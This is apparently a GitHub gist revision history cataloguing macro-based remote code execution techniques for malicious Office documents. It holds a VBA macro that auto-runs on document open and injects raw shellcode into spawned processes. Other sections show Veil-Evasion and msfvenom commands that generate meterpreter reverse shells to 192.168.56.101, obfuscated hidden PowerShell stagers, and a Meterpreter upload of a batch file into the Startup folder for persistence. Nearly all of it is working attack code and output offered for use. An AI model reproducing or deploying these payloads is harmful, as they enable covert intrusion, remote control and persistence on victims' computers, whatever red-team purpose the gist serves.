    Set objShell = CreateObject("WScript.Shell")
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root\default:StdRegProv")
    oReg.EnumValues HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\EMET\AppSettings", arrValues, arrTypes
    Dim smack() As String
    Dim count As Integer
    If IsArray(arrValues) Then
    For count = LBound(arrValues) To UBound(arrValues)
    ReDim Preserve smack(count)
    smack(count) = arrValues(count)
    Next
    Else
    ReDim Preserve smack(0)
    smack(0) = ""
    End If
    getEMET = smack
    End Function
    Public Function AutoPwn() As Long
    myArray = FightEMET
    Dim Count As Integer
    Dim Success As Integer
    For Count = LBound(myArray) To UBound(myArray)
    Dim proc As String
    proc = myArray(Count)
    Success = Inject(proc)
    If Success = 1 Then Exit For
    Next
    End Function
    Public Function FightEMET() As String()
    myArray = getList
    smex = getEMET
    Dim count As Integer
    Dim sCount As Integer
    Dim kCount As Integer
    kCount = 0
    Dim killedEMET() As String
    For count = LBound(myArray) To UBound(myArray)
    progo = myArray(count)
    prog = Split(progo, ".exe")
    kk = Replace(prog(0), "\\", "\")
    Dim gg As String
    gg = kk
    pathKK = Replace(pathOf(Replace(gg, """", "")), "\\", "\")
    Dim fudgeBool As Boolean
    fudgeBool = False
    If Not smex(0) = "" Then
    For sCount = LBound(smex) To UBound(smex)
    If LCase(pathKK) Like LCase(smex(sCount)) Then
    fudgeBool = True
    End If
    Next
    End If
    If fudgeBool = False Then
    ReDim Preserve killedEMET(kCount)
    killedEMET(kCount) = myArray(count)
    kCount = kCount + 1
    End If
    Next
    FightEMET = killedEMET
    End Function
    Public Function Inject(processCmd As String) As Long
    Dim myByte As Long, buf As Variant, myCount As Long, hProcess As Long
    #If VBA7 Then
    Dim lLinkToLibary As LongPtr, rekt As LongPtr, hThread As LongPtr
    #Else
    Dim lLinkToLibary As Long, rekt As Long, hThread As Long
    #End If
    Dim pInfo As PROCESS_INFORMATION
    Dim sInfo As STARTUPINFO
    Dim sNull As String
    Dim sProc As String
    sInfo.dwFlags = 1
    If IsOffice64Bit Then
    On Error Resume Next
    sProc = processCmd
    res = dragonascent(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
    hProcess = pInfo.hProcess
    Dim b64 As Boolean
    b64 = False
    b64 = IsWow64(hProcess)
    inject64 = True
    If b64 = True Then
    If inject64 = True Then
    If hProcess = 0 Then
    Exit Function
    End If
    lLinkToLibrary = watergun(hProcess, 0&, &H2be, &H3000, PAGE_READWRITE)
    If lLinkToLibrary = 0 Then
    sly = bodyslam(hProcess, lol)
    Exit Function
    End If
    Position = lLinkToLibrary
    buf = Array(72,131,228,240,232,204,0,0,0,65,81,65,80,82,81,86,72,49,210,101,72,139,82,96,72,139,82,24,72,139,82,32,72,139,114,80,72,15,183,74,74,77,49,201,72,49,192,172,60,97,124,2,44,32,65,193,201,13,65,1,193,226,237,82,65,81,72,139,82,32,139,66,60,72,1,208,102,129,120,24,11,2,15,133,114,0,0,0,139,128,136,0,0,0,72,133,192,116,103,72,1, _
    208,80,139,72,24,68,139,64,32,73,1,208,227,86,72,255,201,65,139,52,136,72,1,214,77,49,201,72,49,192,172,65,193,201,13,65,1,193,56,224,117,241,76,3,76,36,8,69,57,209,117,216,88,68,139,64,36,73,1,208,102,65,139,12,72,68,139,64,28,73,1,208,65,139,4,136,72,1,208,65,88,65,88,94,89,90,65,88,65,89,65,90,72,131,236,32,65,82,255,224, _
    88,65,89,90,72,139,18,233,75,255,255,255,93,72,49,219,83,73,190,119,105,110,105,110,101,116,0,65,86,72,137,225,73,199,194,76,119,38,7,255,213,83,83,72,137,225,83,90,77,49,192,77,49,201,83,83,73,186,58,86,121,167,0,0,0,0,255,213,232,15,0,0,0,49,57,50,46,49,54,56,46,53,54,46,49,48,49,0,90,72,137,193,73,199,192,187,1,0,0,77, _
    49,201,83,83,106,3,83,73,186,87,137,159,198,0,0,0,0,255,213,232,121,0,0,0,47,72,97,53,67,82,111,71,82,69,107,50,89,104,112,109,69,119,82,112,74,106,119,90,50,102,57,50,104,111,75,119,97,113,54,83,108,45,56,104,66,76,112,57,72,116,101,114,76,54,114,86,99,56,74,112,77,85,113,100,75,106,95,77,80,85,100,99,49,105,82,106,71,56,88,117, _
    103,57,69,95,53,101,98,121,52,65,65,108,99,119,73,81,73,89,51,74,99,54,98,102,73,101,105,84,115,55,104,104,49,89,99,107,99,118,115,108,50,52,111,70,0,72,137,193,83,90,65,88,77,49,201,83,72,184,0,50,160,132,0,0,0,0,80,83,83,73,199,194,235,85,46,59,255,213,72,137,198,106,10,95,72,137,241,106,31,90,82,104,128,51,0,0,73,137,224,106, _
    4,65,89,73,186,117,70,158,134,0,0,0,0,255,213,72,137,241,83,90,77,49,192,77,49,201,83,83,73,199,194,45,6,24,123,255,213,133,192,117,31,72,199,193,136,19,0,0,73,186,68,240,53,224,0,0,0,0,255,213,72,255,207,116,2,235,173,232,86,0,0,0,83,89,106,64,90,73,137,209,193,226,16,73,199,192,0,16,0,0,73,186,88,164,83,229,0,0,0,0, _
    255,213,72,147,83,83,72,137,231,72,137,241,72,137,218,73,199,192,0,32,0,0,73,137,249,73,186,18,150,137,226,0,0,0,0,255,213,72,131,196,32,133,192,116,178,102,139,7,72,1,195,133,192,117,210,88,88,195,88,106,0,89,73,199,194,240,181,162,86,255,213)
    For myCount = LBound(buf) To UBound(buf)
    myByte = buf(myCount)
    rekt = thunderbolt(hProcess, ByVal (lLinkToLibrary + myCount), myByte, 1, b)
    Next myCount
    hThread = flamethrower(hProcess, 0&, 0&, ByVal lLinkToLibrary, 0, 0, ByVal 0&)
    End If
    If hThread = 0 or Inject64 = False Then
    If lLinkToLibrary <> 0 Then
    leechseed hProcess, lLinkToLibrary, 0, MEM_RELEASE
    End If
    hProcess = pInfo.hProcess
    sly = bodyslam(hProcess, lol)
    Exit Function
    Else
    Inject = 1 'Success
    End If
    Else
    If hProcess = 0 Then
    Exit Function
    End If
    lLinkToLibrary = watergun(hProcess, 0&, &H1b5, &H3000, PAGE_READWRITE)
    If lLinkToLibrary = 0 Then
    sly = bodyslam(hProcess, lol)
    Exit Function
    End If
    Position = lLinkToLibrary
    buf = Array(232,130,0,0,0,96,137,229,49,192,100,139,80,48,139,82,12,139,82,20,139,114,40,15,183,74,38,49,255,172,60,97,124,2,44,32,193,207,13,1,199,226,242,82,87,139,82,16,139,74,60,139,76,17,120,227,72,1,209,81,139,89,32,1,211,139,73,24,227,58,73,139,52,139,1,214,49,255,172,193,207,13,1,199,56,224,117,246,3,125,248,59,125,36,117,228,88,139,88,36,1, _
    211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,95,95,90,139,18,235,141,93,104,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,255,213,49,219,83,83,83,83,83,104,58,86,121,167,255,213,83,83,106,3,83,83,104,187,1,0,0,232,192,0,0,0,47,85,55,69,102,86,99,88,70,120,72,104,116,122,87,122,77, _
    78,70,71,57,76,103,105,122,109,118,108,72,79,115,56,77,119,111,66,55,100,78,84,79,103,108,76,66,99,65,89,0,80,104,87,137,159,198,255,213,137,198,83,104,0,50,224,132,83,83,83,87,83,86,104,235,85,46,59,255,213,150,106,10,95,104,128,51,0,0,137,224,106,4,80,106,31,86,104,117,70,158,134,255,213,83,83,83,83,86,104,45,6,24,123,255,213,133,192,117, _
    20,104,136,19,0,0,104,68,240,53,224,255,213,79,117,205,232,75,0,0,0,106,64,104,0,16,0,0,104,0,0,64,0,83,104,88,164,83,229,255,213,147,83,83,137,231,87,104,0,32,0,0,83,86,104,18,150,137,226,255,213,133,192,116,207,139,7,1,195,133,192,117,229,88,195,95,232,107,255,255,255,49,57,50,46,49,54,56,46,53,54,46,49,48,49,0,187,240,181,162, _
    86,106,0,83,255,213)
    For myCount = LBound(buf) To UBound(buf)
    myByte = buf(myCount)
    rekt = thunderbolt(hProcess, ByVal (lLinkToLibrary + myCount), myByte, 1, b)
    Next myCount
    hThread = flamethrower(hProcess, 0&, 0&, ByVal lLinkToLibrary, 0, 0, ByVal 0&)
    If hThread = 0 Then
    If lLinkToLibrary <> 0 Then
    leechseed hProcess, lLinkToLibrary, 0, MEM_RELEASE
    End If
    hProcess = pInfo.hProcess
    sly = bodyslam(hProcess, lol)
    Exit Function
    Else
    Inject = 1 'Success
    End If
    End If
    Else
    sProc = processCmd
    res = dragonascent(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
    hProcess = pInfo.hProcess
    If hProcess = 0 Then
    Exit Function
    End If
    lLinkToLibrary = watergun(hProcess, 0&, &H1b5, &H3000, PAGE_READWRITE)
    If lLinkToLibrary = 0 Then
    sly = bodyslam(hProcess, lol)
    Exit Function
    End If
    Position = lLinkToLibrary
    buf = Array(232,130,0,0,0,96,137,229,49,192,100,139,80,48,139,82,12,139,82,20,139,114,40,15,183,74,38,49,255,172,60,97,124,2,44,32,193,207,13,1,199,226,242,82,87,139,82,16,139,74,60,139,76,17,120,227,72,1,209,81,139,89,32,1,211,139,73,24,227,58,73,139,52,139,1,214,49,255,172,193,207,13,1,199,56,224,117,246,3,125,248,59,125,36,117,228,88,139,88,36,1, _
    211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,95,95,90,139,18,235,141,93,104,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,255,213,49,219,83,83,83,83,83,104,58,86,121,167,255,213,83,83,106,3,83,83,104,187,1,0,0,232,192,0,0,0,47,85,55,69,102,86,99,88,70,120,72,104,116,122,87,122,77, _
    78,70,71,57,76,103,105,122,109,118,108,72,79,115,56,77,119,111,66,55,100,78,84,79,103,108,76,66,99,65,89,0,80,104,87,137,159,198,255,213,137,198,83,104,0,50,224,132,83,83,83,87,83,86,104,235,85,46,59,255,213,150,106,10,95,104,128,51,0,0,137,224,106,4,80,106,31,86,104,117,70,158,134,255,213,83,83,83,83,86,104,45,6,24,123,255,213,133,192,117, _
    20,104,136,19,0,0,104,68,240,53,224,255,213,79,117,205,232,75,0,0,0,106,64,104,0,16,0,0,104,0,0,64,0,83,104,88,164,83,229,255,213,147,83,83,137,231,87,104,0,32,0,0,83,86,104,18,150,137,226,255,213,133,192,116,207,139,7,1,195,133,192,117,229,88,195,95,232,107,255,255,255,49,57,50,46,49,54,56,46,53,54,46,49,48,49,0,187,240,181,162, _
    86,106,0,83,255,213)
    For myCount = LBound(buf) To UBound(buf)
    myByte = buf(myCount)
    rekt = thunderbolt(hProcess, ByVal (lLinkToLibrary + myCount), myByte, 1, b)
    Next myCount
    hThread = flamethrower(hProcess, 0&, 0&, ByVal lLinkToLibrary, 0, 0, ByVal 0&)
    If hThread = 0 Then
    If lLinkToLibrary <> 0 Then
    leechseed hProcess, lLinkToLibrary, 0, MEM_RELEASE
    End If
    hProcess = pInfo.hProcess
    sly = bodyslam(hProcess, lol)
    Exit Function
    Else
    Inject = 1 'Success
    End If
    End If
    End Function
    Sub AutoOpen()
    DieTotal
    AutoPwn
    End Sub
    Sub Workbook_Open()
    DieTotal
    AutoPwn
    End Sub
    ```

    ---
  9. @mgeeky mgeeky revised this gist Aug 23, 2017. 1 changed file with 48 additions and 0 deletions.
    48 changes: 48 additions & 0 deletions Various-Macro-Based-RCEs.md
    View file
    Original file line number Diff line number Diff line change
    @@ -12,6 +12,7 @@ List:
    3. Metasploit generated payload `vba-exe`
    4. Metasploit generated payload `vba-psh`
    5. `Empire` generated `windows/macro` stager
    6. Using `Veil-Evasion` generated _powershell.exe_ command within `Luckystrike` generated macro


    ---
    @@ -513,3 +514,50 @@ Obviously we can enhance it any further as we wish, as well as obfuscate it litt

    ---

    **6. Using `Veil-Evasion` generated _powershell.exe_ command within `Luckystrike` generated macro**

    This one is quite fancy. Firstly, we generate `powershell.exe -Command "[...]"` Shell command that will get executed directly from within Macro code prepared by hand or by Luckystrike (the latter tool doesn't introduce anything fancy here).

    - So, the first step is to obtain a Powershell command for **windows/meterpreter/reverse_https**:

    ```
    ./Veil.py -t Evasion -p 21 --ip 192.168.56.101 --port 443 --msfvenom windows/meterpreter/reverse_https --msfoptions LHOST=192.168.56.101 LPORT=443 -o msf2
    ```

    We will get a result similar to:

    ```
    ===============================================================================
    Veil-Evasion
    ===============================================================================
    [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    ===============================================================================
    [*] Language: powershell
    [*] Payload Module: powershell/meterpreter/rev_https
    [*] PowerShell doesn't compile, so you just get text :)
    [*] Source code written to: /usr/share/veil-output/source/msf2.bat
    [*] Metasploit RC file written to: /usr/share/veil-output/handlers/msf2.rc
    ```

    - Then we edit the resulted **msf2.bat** file to make it leverage `start /b`. To do so, we prepend every **powershell.exe** invocation with this `start /b` command.

    This script should look like:

    ```
    @echo off
    if %PROCESSOR_ARCHITECTURE%==x86 (start /b powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRtb9tGDP7uX0EIN0BCLEV+aZZYCNDUadZsdZrFbtLNMIazRFvXnO6U08mR4/q/j3I0x/26LzqR4vF5SD4Ue4JzeO+0ppdSXme5NtZ1HtEolL1ukEjpeDPIy7kUMRSWWzqwsvQdrpW9tQbuhbEllxdS6thtfDK/SBKDRdGGUigLyfNYvGBjLF5jKZVWk3X+5r412mJsveh/cxka5BYnKR3JG5dX+8JaI+alxQNSlsePr8z2weQzds9+777lhmdIWPvLOywq4Ury5WHkK9p1QmU471vWrDcsoQ47Fx+Glx+vfvt0/fsfn0c3X27/vBtPvt4/fPvrbz6PE1wsU/H9UWZK50+msOXquVq/hJ1ur//u5NfTMyeY6GHKzYUxfO16rUWp4hodYpetvA0YtCX1wXWnxG46mwFb/XwDfsAIeVEa9L/Mv1ObwR+XmRfQA36BsOqEIfj4BGddb/uW3cKGLWr2TtQJgt6Phabi4tTXuxT07egcWDJ1l2h9w1WiM/AzXomMsrIk+IxqaVNvto0afmwRHWRH2EBudEyths2U10RnrCI4ehwB+2cbAaqEKFTEviA1NLiwcRU+/2fc7XC9QJEWXG+7PQBYboAYg8vEeRgxAb60cNKnt6Mjb8NSQrIRe6wBE0LACKApkK5IEMT3keKKOiCtGckIxAJc6nnhebDvOkUQbGM4Z6tvXx0qc3qDNhijWYkYbzWNZcQVX6KZDQa1F80QjRULQZuA91yKZCenIZdyTrIkzA2zpsRtxDIybqjgZnDjdWExC+r0DzgfSoHKRi2WBZ9IeGiKgOTrOmWBxic8ZZ02OCP9IqTkx/0gJP46ywlsLqni0fj6I5wEnQgeBPXxuYCbied4EVMEuoxg+mFtcSeovG5DFlzqZyU1Ty655a6TWpsXg+Pjzlk36JycBu8oVdgZ9Pu9Y6Yc8FpM0zUi5NerTuLAbI7mEhdCid2I2BP4N7Ra4BB+r+uAr8gqch4j7DxXzTAL8HNeFDY1ZYtV50wPBj/9esI2yxvBtcOqF4YhHf3Qi6ZNv+5KZUWGAW0qGp03kymCETdFyiWNZajztcvyNoRtmL4u9MxlFS0SGb2u63lt2IPUpdGVwz8OIbZZ1a6PsF44XVpflZJUs/ur+GOJmNPeYaxJ1qcn/TDc0vTjdLP9Fw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();") else (start /b %WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRtb9tGDP7uX0EIN0BCLEV+aZZYCNDUadZsdZrFbtLNMIazRFvXnO6U08mR4/q/j3I0x/26LzqR4vF5SD4Ue4JzeO+0ppdSXme5NtZ1HtEolL1ukEjpeDPIy7kUMRSWWzqwsvQdrpW9tQbuhbEllxdS6thtfDK/SBKDRdGGUigLyfNYvGBjLF5jKZVWk3X+5r412mJsveh/cxka5BYnKR3JG5dX+8JaI+alxQNSlsePr8z2weQzds9+777lhmdIWPvLOywq4Ury5WHkK9p1QmU471vWrDcsoQ47Fx+Glx+vfvt0/fsfn0c3X27/vBtPvt4/fPvrbz6PE1wsU/H9UWZK50+msOXquVq/hJ1ur//u5NfTMyeY6GHKzYUxfO16rUWp4hodYpetvA0YtCX1wXWnxG46mwFb/XwDfsAIeVEa9L/Mv1ObwR+XmRfQA36BsOqEIfj4BGddb/uW3cKGLWr2TtQJgt6Phabi4tTXuxT07egcWDJ1l2h9w1WiM/AzXomMsrIk+IxqaVNvto0afmwRHWRH2EBudEyths2U10RnrCI4ehwB+2cbAaqEKFTEviA1NLiwcRU+/2fc7XC9QJEWXG+7PQBYboAYg8vEeRgxAb60cNKnt6Mjb8NSQrIRe6wBE0LACKApkK5IEMT3keKKOiCtGckIxAJc6nnhebDvOkUQbGM4Z6tvXx0qc3qDNhijWYkYbzWNZcQVX6KZDQa1F80QjRULQZuA91yKZCenIZdyTrIkzA2zpsRtxDIybqjgZnDjdWExC+r0DzgfSoHKRi2WBZ9IeGiKgOTrOmWBxic8ZZ02OCP9IqTkx/0gJP46ywlsLqni0fj6I5wEnQgeBPXxuYCbied4EVMEuoxg+mFtcSeovG5DFlzqZyU1Ty655a6TWpsXg+Pjzlk36JycBu8oVdgZ9Pu9Y6Yc8FpM0zUi5NerTuLAbI7mEhdCid2I2BP4N7Ra4BB+r+uAr8gqch4j7DxXzTAL8HNeFDY1ZYtV50wPBj/9esI2yxvBtcOqF4YhHf3Qi6ZNv+5KZUWGAW0qGp03kymCETdFyiWNZajztcvyNoRtmL4u9MxlFS0SGb2u63lt2IPUpdGVwz8OIbZZ1a6PsF44XVpflZJUs/ur+GOJmNPeYaxJ1qcn/TDc0vTjdLP9Fw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();")
    ```

    - Afterwards, we upload the resulted **msf2.bat** file to the target machine, for instance via _Meterpreter_:

    ```
    meterpreter> upload /usr/share/veil-output/source/msf2.bat "%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\nasty.bat"
    ```

    And that's all.



    ---
  10. @mgeeky mgeeky revised this gist Aug 21, 2017. 1 changed file with 57 additions and 2 deletions.
    59 changes: 57 additions & 2 deletions Various-Macro-Based-RCEs.md
    View file
    Original file line number Diff line number Diff line change
    @@ -10,7 +10,8 @@ List:
    1. The [Unicorn](https://github.com/trustedsec/unicorn) **Powershell** based payload
    2. `regsvr32` based method
    3. Metasploit generated payload `vba-exe`
    4. `Empire` generated `windows/macro` stager
    4. Metasploit generated payload `vba-psh`
    5. `Empire` generated `windows/macro` stager


    ---
    @@ -362,7 +363,61 @@ As the macro's comment suggest, the long blob of bytes at the end of this script
    ---


    **4. `Empire` generated `windows/macro` stager**
    **4. Metasploit generated payload `vba-psh`**

    In this method, we leverage the Metasploit's `msfvenom` utility to generate a `vba-psh` payload that is similar to `Unicorn` in its form meaning that this is a payload consiting of `powershell.exe` invocation.

    We can generate this macro as follows:

    ```
    work|16:42|~ # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=443 -f vba-psh
    ```

    Then we will get the following output:

    ```
    Sub pm6HSAm()
    Dim rkEsZ
    rkEsZ = "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB" _
    & "3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHM" _
    & "ALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEATQB" _
    & "wAHAAbQAxAGsAQwBBADcAMQBXAGIAVwAvAGEAUwBCAEQAKwBuAEUAcgA5AEQAMQBhAEYAaABLADAAUwBiAEEAaAB0AG0AawBpAFYAYgBvADAAQgBrADIAQQBDAGMAWQBBAEEAUgBkAFYAaQByADgAMgBTAHQAWgBmAFkAYQA5ADUANgAvAGUAOAAzAEIAdAB6AFEATgBqAG4AbAA3AHEAUwB6AFEATgA3AGQAbQBkAG0AWgBmAGUAYQBaAEgAWAB0AEo" _
    & "ANgBBAGoASwBRADIAawBaAGEAMAB3ADMAagBmAGwAVQArAHYAYgAyAHoAVQBrAEgAUgB6AGkAUQA1AEYAeABRAEUAcQBPAEMAbABQAE8ATQB3AGUAUAA2AEkAdABaAHMAeQA2AG8AcQBKAHkAZQBnAGsAQQBzAEgASgBQAHgAQQBwAE0AKwBTAFAARQBhAEwAaABjAEUARABUAE0AUABKADUAVwBVADEAaQBTAEkAUwBpAHYAMgA4ADIAQwBBAEMAeAB" _
    & "UAEUASgBwAG8AeQBTAFcARgBhAGsAUAA2AFgAQgBqAEUAVABrADkARwBZADYASgA0ADYAUQB2AGsAbQA1AHIAOABVAEcANAAxAFAATQBEAG0AcQBiAEsAbgBaAG0AUgBEAHAARgBvAFoAdgBLAFcAdAB6AEIAYQBYAFIARgBlADgARwBvAGsAUABOAGYAdgB1AFMAVgA4AFcAbABwAFUAcQB3ADkASgBwAGoARgBjAHQANwBlAHgASQBJAEUAUgBaAGU" _
    & "AeAB2AEMASgA5AFYAMQBLAEgAZAA1AHMARgBrAGYATQBXAGQAUwBJAGUAYwAwADgAVQBCAHoAUQA4AEsAeABkADcAWQBZAHcAOQAwAG8AYgBkAGwAcwBRAGkAWQBzAGIAZABPAEsALwBBAE8AZQBBAFgARQBaAEYARQBvAFgAUQA0AFUAYgByAEYAWABrAEgATwB3ADcAQQBUAGMAUQBlADUAYgBrAFIAaQAwAEMAOAAyAHcAeQBWAC8ASQBIAEkAdQB" _
    & "UAEIAZwByAFMASAAvAEkANAA0AFAALwAyAHkAUQBVAE4AQwBBAGcARgB5AFQAaQBDADUAdABFAFMAKwBxAFEAdQBHAGoAaQAwAEcAWABrAGwAbgBnAFQAdQBVADEAVwAyAGIARgBmAGEAeQBRAGYARwA0AEYAVwBSADAAUgBLAEEAWgBMAHkAYgBLAEEAVwBkAHgATgBHADkAcgBaADUANQBmAGQAUQBkADYAbABVADQAUABrADEAbgBZAEQAQwA5ADc" _
    & "AZAB2ADMAcgA3AHgATQBpAFoAZwByAFcANgBZAHcANAB0AGoASABzAEQAbwBaAEwAdwBiAEUANABoAFYANwB2AEMAWQA3AGwAUQAvAFMAMQBwAEIAcwBzAEEAbgBGAGoAegBhAHcARABSADMARgB5AFYARQBtAFUAagBqAE4AQQB2AGoAeQBRAFIAOABOAGMAaABkAGUASQA3AEYAOQBLAGIAdwA4AGkANgBsAHoAQQBRAE0AbwBqAEMAZQBEAGMAMwB" _
    & "xADMAUABpADAAQgBNAG0ANAB6ADYAawA3AEEAYwB0AEQAcwBuAEwATwBkAEgAcAA3AE0AMwBlADAAMAB0AGsAZwBGAGIALwBNAFAAWQBOADQATgBDAFQARwBKAHMAUQBCAGQAVABKADYAeQBjAC8AbABnAFgAaQBNADcASQA1AGUAegBOAFQAYQBFAEsASwBjAFAAdwBpAEkAYQB4AEIARwBmAEMAeABTAFgAQQB2AFMAKwBIAGUAegBXAGsARABGAEQ" _
    & "AMQBzADkAbwBjAHcAbABFAFgASQBnAGwAegBGAEUAQgBXAGwAVwBmAGcANQBtAG4AeQBvADUAMwB3AHcAdABFAGcAQgB1ACsAMwBrACsAVABRAHkAUQBtAG0AVABhAEIAeQBKAHYATQB1AC8AcABIAEoAVAB5AFYAWQBiAGoAdQBDAEIAMQBFAHEAZwBxAHAAeQBEAFoAQgBEAFAAaQBGAGkAUQBVAHgAdgBRAGcAUQBvAG4AZwB1ADIASAArAEsAVgB" _
    & "3AHIAWQBZAEkANgBPAEIAYgBaAGQAaABQAGwARgB6AGcAUABiAHEAcwA4AGoARQBXAFUATwBKAEIAUgBnAE8ARABPAFgAaABDAEgAWQBwAFkAaQBVAHAAQgBNADYAaABKADkAWQAxAE0ALwBjADUAOQAvAEYAbwA4AHEAWgBvAHkARwBQAHUAeQAwAGgASAB6AEEAUwBvAHEARABMAFYASwBlAFIARwA3AGgAbQBCAE4ASwAwAFMAYQBpAEcAUwB3AFk" _
    & "AQwBVAEIAegBWACsAdAAxAGgAbgAyAG8ANwBFAE4AMQA3AE8AaQBGAGYAZQBMAG0AWAB3AGcAMwBLADQARQA5ADMAMQBOADgATQBtAEMATwBnAG8AVwBrADIANAB5AEwAZwB0AFMAbgBrAFkAQwBiAEkAOABYADYAaQBHAGYALwBKAGEAUwBqAEMAKwBRADQAdQBHAHAARQBEAGkAbQBUAHMAdwBJAGIANgB4AHUAUgAxAGsAUgB1ADEAYgA3AHAAcAB" _
    & "kAHcAOQBBAEwAZQBEAEsAUgBJAEEAVQBUADMAaQBnAFkANQBqADgAcgBGAGkAaQB3AGcAQQBsAE4AKwBwAE4ANwBTAEsANABCAGsAMgBRADIAWQA1ACsAZwBNAHQAbwBSAFUAdABOAFMAMwA0ADkAKwBoAFoAawB4AHYAbgA3AHYAWABWADMARgBRAGoAWQB6ADMAegBVAEQATgB1AFcAbQBiAEgANgBKAHAAbQBaAFgAbABsADkAeQB2AEMAcgBqAFg" _
    & "ARgBkAGEAYwBwAHIATgByADkAZgBHADQAagA4ADcAWQAzAEYASwBNAG0ATQB1ACsAbwA5AGoAQwBzAGIAQgBkAFgAZABHAHUAMwBrAEQAdABjAHEAeAArADMAKwBuAGEAbAA2AGUAdgB0ADMASABlADkAbwBlAEYANQAvAHIAbABuADMANQBZACsAMQBHAGwAcgBVAE8AMwBxAFcAaABtADMAagBGAHIAUwBHAHUAZwByAFgAYQB2AEUATgBiAG8AeQB" _
    & "1ADcAVABYAGYAYgBpAHEAaQArAG0AdwB6ADMARABQAFUALwAzADcAMABnAFcAbQA2ADEAWQAwADcANQBlADQAdABXADAAaQAxAEoAaQBkAE8AZABzAHIAcgA5ACsAWQBXAGUANQBtAGEASwBvAFgAZwA4AG8ARABxAGkARgBVAEQAVwB2ADkAdQBzADYAdgBoADMAcQBFAE8AbQBvAGYAKwAzADIAKwB1AHYAWQByAG8ANABFAFAAWgAyADIAYwBVAHo" _
    & "ATABxADkAdQBwADYAdAAxAHYAWABVAGEAOAB4AGYAegBRAHUAVgBCADkAcwA3AC8ARgBNAEgALwBUAEwAZABMAFMANAB2ADUAMwBCAHYAQQA0AGgAWABLAHQAYQBwAGUAbQBTAEwAUgA5ADIAQQBhAFEARwBSADkAaQAvAEIAUgAyAC8AVwBuAFoAbQBIAHUAZwBZADcANQBIACsAdgBzADMAagBNAG4ANwBRAE8AZABKAEIAcAB6ADUANgBoAEwAaQB" _
    & "HAGkAMwBxAEgAZwBmAHkAdQBWACsAYQBvAHoAOQByADMARwBMAFYARwBtADcAcQBxAGwAbwBhAGQAQwBqAEkAMQBPAG0AagA0AEsATgAwAFMAKwAzAG8AWABvADMAaABwAGIAQQAyADEAMQBIAGUANQBPAC8AagBRAEgAbgBwAHEALwA1ADYAZABxADAAYgAxAGIAdQBGADQAcQBxAHEAdQBUAE8AUABhAEcAWgBYAFcAbgAyADcATwBQADcAVQBHAHQ" _
    & "AQgA5AHcAMQBGAFAAVgAvAHIAdQBVAEgAcwBDAFAASABGADUAdgBMAHMANAB2AHYAcABhAG4AUgAwAGwALwA2AGYASwAzAGMAQgBUAFAATQBBAE0AeQB3AEoAMgBlAGwAVwBxAGQAUgAvAFgARAA3AGQAegBoAE4ATABXAFEANQBhAGQAKwAvAFUAQwBpAGsARABEAG8AYwBkAEEARgBNADQASQBqAHgAcgBpAFQATgBvAHYAcwBNAG8AZABlAHQAZQA" _
    & "4AGcARQA2AGoAWQBIAGcAegBQAHkAcwArAE8ARgBPAG0ASABvAHYATABVAFIAYgBLAGwAeQA4AHMAUgBSAEEAdgBsAGsAbABLADQAMgBDAEsAaABMADIAWQBGAGIAWAAyAG0AYQBkAEEASAB0AEgAVgBGAGcAeQBPAC8ALwBvAFIAVgB2AHQAagBJAHUANgAwAEsAYQBSADkANQB3AGkAbAB6AHcASABZAE8AbABMAFIANABjAHMAbQBxAE8AZwAxAHE" _
